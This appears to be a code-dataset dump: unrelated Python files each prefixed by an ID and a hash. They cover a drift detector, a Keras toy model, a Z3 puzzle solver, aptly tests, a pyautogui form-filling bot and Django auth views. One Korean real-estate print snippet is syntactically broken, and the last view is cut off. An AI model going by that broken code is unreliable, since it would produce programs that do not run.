        return
    for err in errors:
        location = "/".join(str(part) for part in err.path)
        LOGGER.error("%s (%s)" % (err.message, location))
    raise ValueError("Validation failed")
|
983,773 | 4301788ffceace90124439c1a0b3f86ec7159a4f |
from drift_detector.stream_volatility.buffer import Buffer
from drift_detector.stream_volatility.reservoir import Reservoir
class VolatilityDetector:
    """
    A drift detector is a detector that monitors the changes of stream volatility.
    Stream Volatility is the rate of changes of the detected changes given by a drift detector like Adwin.
    We can see this kind of detector as a drift detector the a set of given drifts and we call it volatility detector.
    A volatility detector takes the output of a drift detector and outputs an alarm if there is a change in the rate
    of detected drifts.
    The implementation uses two components: a buffer and a reservoir.
    The buffer is a sliding window that keeps the most recent samples of drift intervals acquired from
    a drift detection technique. The reservoir is a pool that stores previous samples which ideally represent
    the overall state of the stream.
    References
    ----------
    Huang, D.T.J., Koh, Y.S., Dobbie, G., Pears, R.: Detecting volatility shift in data streams.
    In: 2014 IEEE International Conference on Data Mining (ICDM), pp. 863–868 (2014)
    """
    def __init__(self, drift_detector, size):
        """
        Initialize a drift detector
        Parameters
        ----------
        drift_detector: type drift_detector
            The volatility detector takes the output of a drift detector.
            The corresponding drift detector is passed here to monitor its outputs.
        size: int
            Size of the reservoir and buffer by default.
        """
        self.drift_detector = drift_detector
        self.sample = 0  # total number of inputs processed so far
        self.reservoir = Reservoir(size)  # long-term pool of drift intervals
        self.buffer = Buffer(size)  # sliding window of recent drift intervals
        # Relative-variance band (+/- 5%) outside which a volatility shift is declared.
        self.confidence = 0.05
        self.recent_interval = []  # rolling log of the last 2*size intervals
        self.timestamp = 0  # samples elapsed since the last detected drift
        self.vol_drift_found = False
        self.drift_found = False
        self.pre_drift_point = -1  # sample index of the most recent drift
        self.rolling_index = 0  # write cursor into recent_interval
        for i in range(size * 2 + 1):
            self.recent_interval.append(0.0)
    def set_input(self, input_value):
        """
        Main part of the algorithm, takes the drifts detected by a drift detector.
        Parameters
        ----------
        input_value: real value
            The input value of the volatility detector, the value should be real values and should be the output
            of some drift detector.
        Returns
        -------
        vol_drift_found: true if a drift of stream volatility was found.
        """
        self.sample += 1
        self.drift_found = self.drift_detector.set_input(input_value)
        if self.drift_found:
            self.timestamp += 1
            # When the sliding window is full, its evicted element migrates
            # into the reservoir so older history is still represented.
            if self.buffer.is_full:
                result_buffer = self.buffer.add(self.timestamp)
                self.reservoir.add_element(result_buffer)
            else:
                self.buffer.add(self.timestamp)
            interval = self.timestamp
            self.recent_interval[self.rolling_index] = interval
            self.rolling_index += 1
            if self.rolling_index == self.reservoir.size * 2:
                self.rolling_index = 0
            # Restart the interval counter at each detected drift.
            self.timestamp = 0
            self.pre_drift_point = self.sample
            if self.buffer.is_full and self.reservoir.check_full():
                # Ratio of recent vs. historical interval spread; a value far
                # from 1.0 means the drift rate itself has changed.
                relative_var = self.buffer.get_stddev() / self.reservoir.get_stddev()
                if relative_var > (1.0 + self.confidence) or relative_var < (1.0 - self.confidence):
                    self.buffer.clear()
                    # self.severity_buffer[:] = []
                    self.vol_drift_found = True
                else:
                    self.vol_drift_found = False
        else:
            self.timestamp += 1
            self.vol_drift_found = False
        return self.vol_drift_found
|
983,774 | c77e7892c2ed41269a200696b504c0831fcd4276 | from .common_cfg import *
import random
# Master switch: set to False to disable this periodic task.
enable_task = True
# Weather endpoint polled by the task (Spanish localisation).
data_url = 'http://clima.info.unlp.edu.ar/last?lang=es'
mqtt_sensor_id = 'linti_control'
# Random 4-hex-digit suffix avoids MQTT client-id collisions between instances.
mqtt_client_id = mqtt_sensor_id + '_{:04x}'.format(random.getrandbits(16))
# Polling period, in seconds.
seconds_between_checks = 60
|
983,775 | 2adefff0dfce240cdd3a2a258fec2b669b222b1b | import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras import optimizers
# collect the training data
# Each sample is a 2-D point; label is 1 when x < y, 0 when x > y.
x_train = np.array([[1, 5], [2, 7], [9, 14], [6, 10], [8, 21], [16, 19],
                    [5, 1], [7, 2], [14, 9], [10, 6], [21, 8], [19, 16]])
y_train = np.array([[1], [1], [1], [1], [1], [1],
                    [0], [0], [0], [0], [0], [0]])
print(x_train)
print(y_train)
# design the model
# Single linear unit without bias, followed by a sigmoid -> logistic regression.
model = Sequential()
model.add(Dense(1, input_dim=2, activation=None, use_bias=False))
model.add(Activation('sigmoid'))
# compile the model and pick the optimizer and loss function
# NOTE(review): newer Keras releases renamed `lr` to `learning_rate` — confirm
# the installed version still accepts `lr`.
ada = optimizers.Adagrad(lr=0.1, epsilon=1e-8)
model.compile(optimizer=ada, loss='binary_crossentropy', metrics=['accuracy'])
# training the model
# NOTE(review): fit() is called twice (mini-batch then full-batch), so the
# model trains for 200 epochs in total — confirm this is intentional.
print('training')
model.fit(x_train, y_train, batch_size=4, epochs=100, shuffle=True)
model.fit(x_train, y_train, batch_size=12, epochs=100, shuffle=True)
# test the model
# One point from each class: [2, 20] should score near 1, [20, 2] near 0.
test_ans = model.predict(np.array([[2, 20], [20, 2]]), batch_size=2)
print('model_weight')
print(model.layers[0].get_weights())
print('ans')
print(test_ans)
983,776 | b9052813dca187d59428b54d6a808fae25b8064d | # Size of a single page in a paginated query.
_PAGE_SIZE = 100
class PaginatedCollection:
""" An iterable collection of database objects (Projects, Labels, etc...).
Implements automatic (transparent to the user) paginated fetching during
iteration. Intended for use by library internals and not by the end user.
For a list of attributes see __init__(...) documentation. The params of
__init__ map exactly to object attributes.
"""
def __init__(self, client, query, params, dereferencing, obj_class):
""" Creates a PaginatedCollection.
Params:
client (labelbox.Client): the client used for fetching data from DB.
query (str): Base query used for pagination. It must contain two
'%d' placeholders, the first for pagination 'skip' clause and
the second for the 'first' clause.
params (dict): Query parameters.
dereferencing (iterable): An iterable of str defining the keypath
that needs to be dereferenced in the query result in order to
reach the paginated objects of interest.
obj_class (type): The class of object to be instantiated with each
dict containing db values.
"""
self.client = client
self.query = query
self.params = params
self.dereferencing = dereferencing
self.obj_class = obj_class
self._fetched_pages = 0
self._fetched_all = False
self._data = []
def __iter__(self):
self._data_ind = 0
return self
def __next__(self):
if len(self._data) <= self._data_ind:
if self._fetched_all:
raise StopIteration()
query = self.query % (self._fetched_pages * _PAGE_SIZE, _PAGE_SIZE)
self._fetched_pages += 1
results = self.client.execute(query, self.params)
for deref in self.dereferencing:
results = results[deref]
page_data = [
self.obj_class(self.client, result) for result in results
]
self._data.extend(page_data)
if len(page_data) < _PAGE_SIZE:
self._fetched_all = True
if len(page_data) == 0:
raise StopIteration()
rval = self._data[self._data_ind]
self._data_ind += 1
return rval
|
983,777 | 58268bdfb94d3bdc892f6e3d95d514d5f1bce554 | street= "서울시 종로구"
type = "아파트"
number_of_rooms
price = 1000000
print("################################")
print("# #")
print("# 부동산 매물 광고 #")
print("# #")
print("##################################")
print("")
print(street,"에 위치한 아주 좋은", type , "가 매물로 나왔습니다.이",type,"는 "
number_of_rooms,"개의 바을 가지고 있으며 가격은",price,"입니다.")
|
983,778 | 50fd5ea8578e6584968a61a04be3d22a61deba04 | from lib import BaseTest
class CreateRepo1Test(BaseTest):
"""
create local repo: regular repo
"""
runCmd = "aptly repo create repo1"
def check(self):
self.check_output()
self.check_cmd_output("aptly repo show repo1", "repo_show")
class CreateRepo2Test(BaseTest):
    """
    create local repo: regular repo with comment
    """
    runCmd = "aptly repo create -comment=Repository2 repo2"
    def check(self):
        self.check_output()
        # The comment should appear in the `repo show` gold output.
        self.check_cmd_output("aptly repo show repo2", "repo_show")
class CreateRepo3Test(BaseTest):
    """
    create local repo: duplicate name
    """
    # Pre-create the repo so the command under test hits a name collision.
    fixtureCmds = ["aptly repo create repo3"]
    runCmd = "aptly repo create -comment=Repository3 repo3"
    # Creating a duplicate repo must fail with exit code 1.
    expectedCode = 1
|
983,779 | 05efdb7a8b3151cfaab4dea9ddd309e5493572b8 | '''Star battle puzzle solver using Z3
Inspired by minesweeper solver in Sec 3.9 of https://sat-smt.codes/SAT_SMT_by_example.pdf
and https://github.com/ppmx/sudoku-solver
'''
from utils import *
from pprint import pprint
import time
from z3 import Solver, Int, Or, Sum, sat
def add_constraint(expr, solver, debug=False, msg=""):
    """Add one constraint to the solver, optionally tracing it.

    Returns 1 so call sites can keep a running count of added constraints.
    """
    if debug:
        # Same output as two separate print calls.
        print(msg, expr, sep="\n")
    solver.add(expr)
    return 1
def solve(puzzle, debug=False):
    """Solve a star-battle puzzle with Z3.

    Args:
        puzzle: dict with keys "regions" (n x n grid of region ids),
            "size" (board side n) and "stars" (stars per row/column/region).
        debug: when True, print every constraint as it is added.

    Returns:
        n x n list of 0/1 ints marking star positions.

    Raises:
        Exception: if Z3 reports the puzzle unsatisfiable.
    """
    b = puzzle["regions"]
    n = puzzle["size"]
    st = puzzle["stars"]
    s = Solver()
    # a variable for every cell, plus a border buffer
    # TODO: remove the (left and top) buffer, it's no longer needed
    cells = [[Int(f'r{i}_c{j}') for j in range(0, n + 1)] for i in range(0, n + 1)]
    nc = 0  # number of constraints counter
    for row in range(1, n + 1):
        for col in range(1, n + 1):
            nc += add_constraint(Or(cells[row][col] == 0, cells[row][col] == 1),
                solver=s, debug=debug, msg=f"* Handling cell {row, col}, value must be 0 or 1")
            if row < n:
                nc += add_constraint(Or(cells[row][col] == 0, cells[row + 1][col] == 0),
                    solver=s, debug=debug, msg=" o No adjacent stars, to below")
            if col < n:
                nc += add_constraint(Or(cells[row][col] == 0, cells[row][col + 1] == 0),
                    solver=s, debug=debug, msg=" o No adjacent stars, to the right")
            if row < n and col < n:
                nc += add_constraint(Or(cells[row][col] == 0, cells[row + 1][col + 1] == 0),
                    solver=s, debug=debug, msg=" o No adjacent stars, to the right-below")
            # BUG FIX: the down-left diagonal was never constrained, allowing
            # diagonally adjacent stars at (r, c) and (r+1, c-1).
            if row < n and col > 1:
                nc += add_constraint(Or(cells[row][col] == 0, cells[row + 1][col - 1] == 0),
                    solver=s, debug=debug, msg=" o No adjacent stars, to the left-below")
        this_row = [cells[row][col] for col in range(1, n + 1)]
        nc += add_constraint(Sum(*this_row) == st,
            solver=s, debug=debug, msg=f"* {st} stars in row {row}")
    for col in range(1, n + 1):
        this_col = [cells[row][col] for row in range(1, n + 1)]
        nc += add_constraint(Sum(*this_col) == st,
            solver=s, debug=debug, msg=f"* {st} stars in column {col}")
    # BUG FIX: max(max(b)) took the max of the lexicographically largest row,
    # which is not necessarily the largest region id; scan every row instead.
    for reg in range(0, max(max(r) for r in b) + 1):
        this_region = [cells[row][col] for row in range(1, n + 1) for col in range(1, n + 1)
                       if b[row - 1][col - 1] == reg]
        nc += add_constraint(Sum(*this_region) == st,
            solver=s, debug=debug, msg=f"* {st} stars in region {reg}")
    # SOLVING
    print(f"Asking Z3 to solve {nc} integer constraints in {n * n} variables..")
    if s.check() != sat:
        raise Exception("Z3 says the puzzle is unsolvable.")
    model = s.model()
    sol = []
    for row in range(1, n + 1):
        this_row = [0] * n
        for col in range(1, n + 1):
            this_row[col - 1] = int(model.evaluate(cells[row][col]).as_string())
        sol += [this_row]
    return sol
def main(puzzle):
    """Solve one puzzle, print the solution, then re-check it in pure Python."""
    n = puzzle["size"]
    s = puzzle["stars"]
    print(f"Solving the following {s}-star {n} * {n} puzzle:")
    #pprint(puzzle["regions"])
    print(puzzle_to_string(puzzle))
    print("---------------------")
    # Time only the solver call, not the printing.
    start = time.time()
    sol = solve(puzzle, debug=False)
    end = time.time()
    print("---------------------")
    print(f"Solution found by Z3 after {end - start} secs:")
    print(puzzle_to_string(puzzle,sol))
    #pprint(sol)
    print("--------------------")
    print("Performing manual Python check of solution:")
    # Independent validation of the Z3 model against the puzzle rules.
    res, msg = manual_check(puzzle, sol)
    if res:
        print("Check passed")
    else:
        print("Check failed")
        print(msg)
# Entry point: solves bundled sample puzzle #3 as soon as the module runs.
# NOTE(review): consider guarding with `if __name__ == "__main__":` so that
# importing this module does not trigger a solve.
from sample_puzzles import sample_puzzles
main(sample_puzzles[3])
|
983,780 | f11233f1242ab37b5716d9aa4d1b75a9a0237ac9 | import pyautogui
import time
import pyperclip
import random
import unidecode
from datetime import datetime
import sys
import lorem
stime = float(sys.argv[1])
ltime = float(sys.argv[2])
# --- Thin wrappers around pyautogui/pyperclip with pacing delays. ---
# `stime` (short delay) and `ltime` (long delay) come from the CLI arguments.
def Enter():
    # Press Enter with a small settle delay before and after.
    time.sleep(stime*0.2)
    pyautogui.press("enter")
    time.sleep(stime*0.2)
def tab():
    # Press Tab with a small settle delay before and after.
    time.sleep(stime*0.2)
    pyautogui.press("tab")
    time.sleep(stime*0.2)
def iclick(string):
    # Click the on-screen element located by the given template image.
    time.sleep(stime/2)
    pyautogui.click(string)
    time.sleep(stime/2)
def iwrite(pic,string):
    # Click an image-located field, then paste text via the clipboard.
    iclick(pic)
    pyperclip.copy(string)
    pyautogui.hotkey("ctrl", "v")
def click(x,y):
    # Move the cursor smoothly to (x, y) and click there.
    pyautogui.moveTo(x,y,duration=0.5)
    pyautogui.click(x,y)
def TEnter():
    # Tab to the next control, then press Enter.
    tab()
    Enter()
def twrite(string):
    # Tab to the next field and paste text via the clipboard.
    tab()
    pyperclip.copy(string)
    pyautogui.hotkey("ctrl", "v")
def write(x,y,string):
    # Click at coordinates and paste text via the clipboard.
    click(x,y)
    pyperclip.copy(string)
    pyautogui.hotkey("ctrl", "v")
def tscroll(options):
    # Tab into a dropdown and select a random entry among `options` choices.
    tab()
    Enter()
    for _ in range (random.randrange(1,options)):
        pyautogui.press('down')
        time.sleep(stime*0.1)
    Enter()
    time.sleep(stime)
def iscroll(pic,options):
    # Open an image-located dropdown and select a random entry.
    iclick(pic)
    for _ in range (random.randrange(1,options)):
        pyautogui.press('down')
    pyautogui.press('enter')
    time.sleep(stime)
def scroll_list(x,y,options):
    # Open a dropdown at coordinates and select a random entry.
    click(x,y)
    for _ in range (random.randrange(1,options)):
        pyautogui.press('down')
    pyautogui.press('enter')
    time.sleep(stime)
def szamsor(length):
    """Return a string of `length` random decimal digits."""
    return ''.join(str(random.randrange(10)) for _ in range(length))
def adoszam():
    """Generate a random Hungarian-style tax number: 8 digits, 1 digit, 2 digits."""
    base = ''.join(str(random.randrange(10)) for _ in range(8))
    middle = str(random.randrange(10))
    tail = str(random.randrange(10)) + str(random.randrange(10))
    return '-'.join((base, middle, tail))
# Academic titles occasionally appended to generated contact names.
titulusok=["PhD","DLA"]
# Company names, one per line.
c = open("ceg.txt",'r',encoding="utf8")
cegek=[]
for x in c:
    x=x.strip()
    cegek.append(x)
# NOTE(review): the "cities" list is read from ceg.txt (companies) as well —
# this looks like a copy/paste bug; confirm whether a varos.txt was intended.
v = open("ceg.txt",'r',encoding='utf8')
varosok=[]
for x in v:
    x=x.strip()
    varosok.append(x)
# Public-area (street-type) names.
k = open("kozterulet.txt",'r',encoding='utf8')
kozterulet=[]
for x in k:
    x=x.strip()
    kozterulet.append(x)
# Male first names, female first names, surnames, and job titles.
f = open("ferfi.txt","r",encoding="utf8")
n = open("no.txt",'r', encoding="utf8")
v = open("vezeteknev.txt",'r',encoding="utf8")
m = open("ugyfel\\munkak.txt",'r',encoding="utf8")
ferfinevek =[]
noinevek = []
vezeteknevek = []
munkak = []
for x in f:
    x=x.strip()
    ferfinevek.append(x)
f.close()
for x in n:
    x = x.strip()
    noinevek.append(x)
n.close()
for x in v:
    x = x.strip()
    vezeteknevek.append(x)
for x in m:
    x=x.strip()
    munkak.append(x)
# NOTE(review): f.close() is called a second time here (harmless no-op) while
# v and m stay open until v.close(); the files are then reopened below and
# never read again — likely leftover code.
f.close()
v.close()
f = open("ferfi.txt","r",encoding="utf8")
n = open("no.txt",'r', encoding="utf8")
v = open("vezeteknev.txt",'r',encoding="utf8")
#print(cegek)
# Endless UI-automation loop: creates one randomized customer record per pass
# (details, contacts, contract, TIG, order, prices) in the web app under test.
while True:
    # --- Create a new customer with a random company name and tax number. ---
    #click(500,600)
    iclick("ugyfel\\uj_ugyfel.png")
    twrite(random.choice(cegek))
    twrite(adoszam())
    vevo = random.randrange(2)
    tab()
    if not vevo:
        tab()
        pyautogui.press("space")
    iclick("mentes.png")
    #sales
    scroll_list(1150,470,3)
    #iclick("sales.png")
    click(500,470)
    pyautogui.press("k")
    time.sleep(stime/5)
    pyautogui.press("down")
    time.sleep(stime/5)
    pyautogui.press("down")
    time.sleep(stime/5)
    pyautogui.press("down")
    time.sleep(stime/5)
    pyautogui.press("enter")
    time.sleep(stime/5)
    # --- Edit company details: group tax number, registration number. ---
    #iwrite("ugyfel\\csoportos_adoszam.png",adoszam())
    write(420,330,adoszam())
    cegjegyzekszam = str(random.randrange(10))+ "-"+str(random.randrange(10)) + "-" + szamsor(6)
    write(1060,330,cegjegyzekszam)
    #iwrite("ugyfel\\cegjegyzekszam.png")
    # --- Registered-office address dialog. ---
    click(400,400)
    #iclick("ugyfel\\szekhely.png")
    twrite(szamsor(4))
    twrite(random.choice(varosok))
    kozt = random.choice(kozterulet).split()
    twrite(kozt[0])
    twrite(kozt[-1])
    twrite(szamsor(1))
    iclick("ok.png")
    # --- Mailing-address dialog. ---
    click(1250,400)
    #iclick("ugyfel\\levelezesi_cim.png")
    twrite(szamsor(4))
    twrite(random.choice(varosok))
    kozt = random.choice(kozterulet).split()
    twrite(kozt[0])
    twrite(kozt[-1])
    twrite(szamsor(1))
    iclick("ok.png")
    #write(1100,590,lorem.paragraph())
    #iwrite("ugyfel\\ceg_info.png",lorem.paragraph())
    # --- Pick a client label; retry up to 3 times on image-recognition failure. ---
    label = random.randrange(2)
    tries=0
    while tries<3:
        try:
            if label==0:
                #click(400,680)
                iclick("ugyfel\\clientlabel1.png")
            elif label == 1:
                #click(500,680)
                iclick("ugyfel\\clientlabel2.png")
            tries= 3
        except:
            tries+=1
            print("nem ismert fel egy képet, újrapróbálkozás..")
            time.sleep(3)
    iclick("ugyfel\\mentes.png")
    # --- Add a contact with random name, phone number and e-mail. ---
    iclick("ugyfel\\kontaktok.png")
    iclick("ugyfel\\hozzaadas.png")
    vnev=random.choice(vezeteknevek)
    knev=random.choice(ferfinevek+noinevek)
    twrite(vnev+ " " + knev)
    telszam='06' + str(random.randrange(1,10)) + '0'
    for x in range(7):
        telszam += str(random.randrange(10))
    twrite(telszam)
    twrite(unidecode.unidecode(vnev+knev+"@gmail.com").lower())
    tab()
    if random.randrange(2):
        pyautogui.press("space")
    # ~10% of contacts get an academic title.
    if not random.randrange(10):
        twrite(random.choice(titulusok))
    else:
        tab()
    twrite(lorem.sentence())
    if label==0:
        #click(400,680)
        iclick("ugyfel\\CCPO1.png")
    elif label == 1:
        #click(500,680)
        iclick("ugyfel\\CCPO2.png")
    elif label == 2:
        #click(600,860)
        iclick("ugyfel\\CCPO3.png")
    iclick("mentes.png")
    # --- Add a contract with random start/end dates in the date pickers. ---
    iclick("ugyfel\\szerzodesek.png")
    iclick("ugyfel\\hozzaadas.png")
    twrite(lorem.sentence().split()[0])
    tscroll(3)
    tab()
    tab()
    Enter()
    startdate = random.randrange(10)
    enddate = random.randrange(startdate,20)
    for _ in range(startdate):
        time.sleep(stime/5)
        pyautogui.press("right")
    Enter()
    tab()
    tab()
    Enter()
    for _ in range(enddate):
        time.sleep(stime/2)
        pyautogui.press("right")
    Enter()
    tab()
    if random.randrange(2):
        pyautogui.press("space")
    twrite(str(random.randrange(20)))
    twrite("https://bit.ly/3Bq4jeX")
    TEnter()
    # clientlabel 1: 400, 680 clientlabel2:500,680 clientlabel3:600,680
    #kontaktok: 530,190
    #reszletek:400,190
    #szerződések:680,190
    #megrendelések:830,190
    #virtuális TIG sablon: 1000,190
    # --- TIG (completion certificate) template and virtual TIG. ---
    iclick("ugyfel\\tig.png")
    iclick("ugyfel\\hozzaadas.png")
    twrite(lorem.sentence())
    twrite(lorem.sentence())
    twrite(lorem.sentence())
    TEnter()
    iclick("ugyfel\\szamlazasra_kuld.png")
    iclick("ugyfel\\vir_tig.png")
    iclick("ugyfel\\plus.png")
    time.sleep(ltime)
    tab()
    tab()
    tab()
    tab()
    tab()
    Enter()
    startdate = random.randrange(10)
    enddate = random.randrange(startdate,20)
    for _ in range(startdate):
        time.sleep(stime/5)
        pyautogui.press("right")
    Enter()
    tab()
    tab()
    Enter()
    for _ in range(enddate):
        time.sleep(stime/2)
        pyautogui.press("right")
    Enter()
    iclick("ugyfel\\plus_gray.png")
    tscroll(3)
    twrite(str(random.randrange(1000)))
    tscroll(3)
    twrite(str(random.randrange(1000)))
    tscroll(3)
    twrite(lorem.sentence())
    TEnter()
    #time.sleep(20)
    # --- Add an order and assign workers to it. ---
    iclick("ugyfel\\megrendelesek.png")
    iclick("ugyfel\\hozzaadas.png")
    twrite(random.choice(munkak))
    tscroll(3)
    tscroll(3)
    tscroll(2)
    TEnter()
    time.sleep(ltime)
    iclick("megrendeles\\dolgozok.png")
    iclick("megrendeles\\uj_dolgozo.png")
    twrite(str(random.randrange(2,500)))
    time.sleep(ltime)
    tab()
    tab()
    TEnter()
    #iclick("megrendeles\\kereses.png")
    click(800,670)
    click(800,750)
    TEnter()
    startdate = random.randrange(10)
    for _ in range(startdate):
        time.sleep(stime/5)
        pyautogui.press("right")
    Enter()
    TEnter()
    # --- Optionally add an internship (szakmai gyakorlat) entry. ---
    if random.randrange(2):
        iclick("megrendeles\\uj_szakmai_gyakorlat.png")
        click(800,500)
        tab()
        tab()
        TEnter()
        startdate = random.randrange(10)
        for _ in range(startdate):
            time.sleep(stime/5)
            pyautogui.press("right")
        Enter()
        twrite(str(random.randrange(20,41)))
        TEnter()
        time.sleep(ltime)
    # --- Add a job advertisement. ---
    iclick("megrendeles\\hirdetesek.png")
    iclick("megrendeles\\uj_hirdetes.png")
    twrite(random.choice(munkak))
    TEnter()
    time.sleep(ltime)
    pyautogui.press("browserback")
    time.sleep(ltime)
    # --- Add a price entry with random rates and a random day-type. ---
    iclick("megrendeles\\arak.png")
    iclick("megrendeles\\uj_ar.png")
    twrite(random.choice(munkak))
    tab()
    if random.randrange(2):
        pyautogui.press("space")
    tscroll(3)
    twrite(str(random.randrange(1000,1500)))
    twrite(str(random.randrange(500,1500)))
    tscroll(3)
    startdate = random.randrange(10)
    tab()
    TEnter()
    for _ in range(startdate):
        time.sleep(stime/5)
        pyautogui.press("right")
    Enter()
    for _ in range(12):
        time.sleep(stime/5)
        pyautogui.press("right")
    Enter()
    time.sleep(ltime)
    # Day type: weekday / Saturday / Sunday / holiday / internship.
    tipus = random.randrange(5)
    if tipus == 0:
        iclick("megrendeles\\hetkoznap.png")
    elif tipus == 1:
        iclick("megrendeles\\szombat.png")
    elif tipus == 2:
        iclick("megrendeles\\vasarnap.png")
    elif tipus == 3:
        iclick("megrendeles\\unnepnap.png")
    elif tipus == 4:
        iclick("megrendeles\\szakmai_gyak.png")
    iclick("mentes.png")
    #iclick("megrendeles\\reszletek.png")
    time.sleep(ltime)
    # --- Return to the customer list for the next iteration. ---
    iclick("ugyfel\\ugyfelek_dropdown.png")
    iclick("ugyfel\\ugyfelek.png")
983,781 | 3f9d3ee05be8a101618fd97afdcd4b5c18a2a559 | def first(xs):
"""
Returns the first element of a list, or None if the list is empty
"""
if not xs:
return None
return xs[0]
def second(xs):
    """
    Returns the second element of a list, or None if the list has fewer
    than two elements.
    """
    # BUG FIX: the original only checked for emptiness, so a single-element
    # list raised IndexError instead of returning None.
    if not xs or len(xs) < 2:
        return None
    return xs[1]
983,782 | 8e9eded6c3daf20d13e5fe7e6d3c82203d4fb8bf | from django.http import HttpResponse
from django.shortcuts import render
from .models import Product
# Create your views here.
def index(request):
    """Render the product listing page with every product in the DB."""
    products = Product.objects.all()
    # Product.objects.filter()
    # Product.objects.get() # For getting a single product
    # Product.objects.save() #Inserting a new product or updating one
    # return HttpResponse('Hello World')
    return render(request,'index.html',{'products':products})
def new(request):
    """Placeholder view: returns a plain-text response for new products."""
    return HttpResponse('New Products')
|
983,783 | bdb75984e993c151d34ee3cd0c42cdf3968e9eda | from PIL import Image
from PIL import ImageDraw
import time
import signal
from firob.core.worker.worker import Worker
from robscreen import constants
from pkg_resources import resource_filename
import robscreen.core.bakebit_128_64_oled as oled
from robscreen.core.annuaire import Annuaire
class Screen(Worker):
    """Worker that periodically redraws the active page on the OLED display."""
    def __init__(self):
        # Tick every 0.1 s (Worker's polling period).
        Worker.__init__(self, 0.1)
        print("Init Screen")
        oled.init() # initialze SEEED OLED display
        oled.clearDisplay() # clear the screen and set start position to top left corner
        oled.setNormalDisplay() # Set display to normal mode (i.e non-inverse mode)
        oled.setHorizontalMode() # Set addressing mode to Page Mode
        # Show the splash image, then start on the default page.
        picture = resource_filename('robscreen.resources', 'firob.png')
        image = Image.open(picture).convert('1')
        oled.drawImage(image)
        self.__page = Annuaire.getInstance().getPage(Annuaire.PAGE_DEFAULT)
        time.sleep(1)
    def execute(self):
        # Render the current page into a fresh 1-bit image and push it out.
        image = Image.new('1', (constants.WIDTH, constants.HEIGHT))
        draw = ImageDraw.Draw(image)
        self.__page.draw(draw)
        oled.drawImage(image)
    def end(self):
        # Blank the display when the worker stops.
        oled.clearDisplay()
    def k1(self):
        # Hardware key 1: the current page decides which page comes next.
        page_num = self.__page.k1()
        self.__page = Annuaire.getInstance().getPage(page_num)
    def k2(self):
        # Hardware key 2 handler.
        page_num = self.__page.k2()
        self.__page = Annuaire.getInstance().getPage(page_num)
    def k3(self):
        # Hardware key 3 handler.
        page_num = self.__page.k3()
        self.__page = Annuaire.getInstance().getPage(page_num)
983,784 | 32fd83a8dd2d87e4322fae1f268e0623d2a877e9 | import os, sys
import errno
from pathlib import Path
import json
# Absolute paths for the ASL image dataset and the JSON keypoint output.
cwd = os.getcwd()
ASL_IMAGES = "/images/asl_images/"
TRAINING = cwd + ASL_IMAGES + "asl_alphabet_train/"
# BUG FIX: TESTING was missing the cwd prefix, unlike every other path here,
# so it resolved inconsistently relative to the working directory.
TESTING = cwd + ASL_IMAGES + "asl_alphabet_test/"
OUTPUT = cwd + "/json_output/"
TRAIN_OUT = OUTPUT + "training/"
TEST_OUT = OUTPUT + "testing/"
from OpenPoseExe import Command
class FileIO(object):
    """Small filesystem helper for collecting image file names."""

    def __init__(self, input_dir=None, output_dir=None):
        self.input_dir = input_dir
        self.output_dir = output_dir

    # reads a directory and returns a list of filenames
    def read_image_strings(self, path=None):
        """Walk *path* (or self.input_dir when omitted) and list file names."""
        target = path
        if target is None and self.input_dir is not None:
            target = self.input_dir
        collected = []
        for _root, _dirs, filenames in os.walk(target):
            collected.extend(filenames)
        return collected

    def read_letter_data(self, letter=''):
        """Print the file names found under a single letter's directory."""
        print(self.read_image_strings(letter))

    def read_video_to_json(self, file_path):
        # Not implemented yet.
        pass
class OpenPoseIO(object):
    """Drives the external OpenPose executable over the ASL image folders."""
    def __init__(self):
        # FileIO rooted at the image folder; Command wraps the OpenPose CLI.
        self.f_io = FileIO(ASL_IMAGES)
        self.cmd = Command()
    # populate training data
    def populate_training_data(self):
        # Convert every training image into OpenPose JSON keypoint files.
        self.cmd.image_to_json(img_path=TRAINING, img_out=TRAIN_OUT)
if __name__ == "__main__":
    # Script entry point: generate JSON keypoints for the training set.
    openpose_io = OpenPoseIO()
    openpose_io.populate_training_data()
|
983,785 | 0e29a9c0f12c4322bc005cb933dbb3bb52cbaf88 | from django.conf import settings
from django.contrib import messages
from django.contrib.auth.views import (
LoginView as BaseLoginView, LogoutView as BaseLogoutView, PasswordResetView as BasePasswordResetView,
PasswordResetConfirmView as BasePasswordResetConfirmView
)
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.core.urlresolvers import reverse_lazy
from django.db.transaction import atomic
from django.http import HttpResponseRedirect, Http404
from django.views.generic import ListView, CreateView, FormView, DetailView, View
from django.utils.translation import ugettext_lazy as _
from web.forms import AuthenticationForm, IterationCreateForm, RegistrationForm, PasswordResetForm, SetPasswordForm
from web.models import Iteration, Algorithm
from web.service import add_user_access, send_activation_mail, verify_activation_token
class LoginView(BaseLoginView):
    """
    GET: Renders login form.
    POST: Processes form and logs User in.
    """
    template_name = 'users/login.html'
    # Project-specific subclass of Django's AuthenticationForm (web.forms).
    form_class = AuthenticationForm
class LogoutView(BaseLogoutView):
    """
    GET: Log user out.
    """
    # No customisation needed beyond Django's stock LogoutView.
class RegisterView(FormView):
    """
    GET: Renders registration form.
    POST: Processes registration form and creates and persists a User instance.
    """
    template_name = 'users/register.html'
    form_class = RegistrationForm
    success_url = reverse_lazy('login')
    # Atomic: user creation and the access grant commit or roll back together.
    @atomic
    def form_valid(self, form):
        user = form.save()
        add_user_access(user=user)
        # Sends the e-mail containing the account-activation token.
        send_activation_mail(request=self.request, user=user)
        messages.add_message(
            self.request,
            level=messages.INFO,
            message=_('Registracija uspješna. E-mail za aktivaciju poslan na {}.'.format(user.email))
        )
        return super().form_valid(form)
class RegisterConfirmView(View):
    """
    GET: Verifies activation token and activates the user. Redirects appropriately.
    """
    def get(self, request, *args, **kwargs):
        # Token and base64-encoded user id come from the activation URL.
        token = self.kwargs.get('token', None)
        uidb64 = self.kwargs.get('uidb64', None)
        user_verified = verify_activation_token(uidb64=uidb64, token=token)
        if user_verified:
            messages.add_message(self.request, level=messages.INFO, message=_('Aktivacija uspješna.'))
            return HttpResponseRedirect(redirect_to=settings.LOGIN_URL)
        else:
            # Invalid/expired token: present a 404 rather than leaking detail.
            raise Http404
class PasswordResetView(BasePasswordResetView):
    """
    GET: Renders password reset form email.
    POST: Processes form and send a reset link.
    """
    template_name = 'users/password_reset.html'
    form_class = PasswordResetForm
    success_url = reverse_lazy('login')
    def form_valid(self, form):
        """Queue a confirmation message before the base class sends the mail."""
        # Message (Croatian): "Activation link sent to the e-mail address."
        messages.add_message(self.request, level=messages.INFO, message=_('Aktivacijski link poslan na e-mail adresu.'))
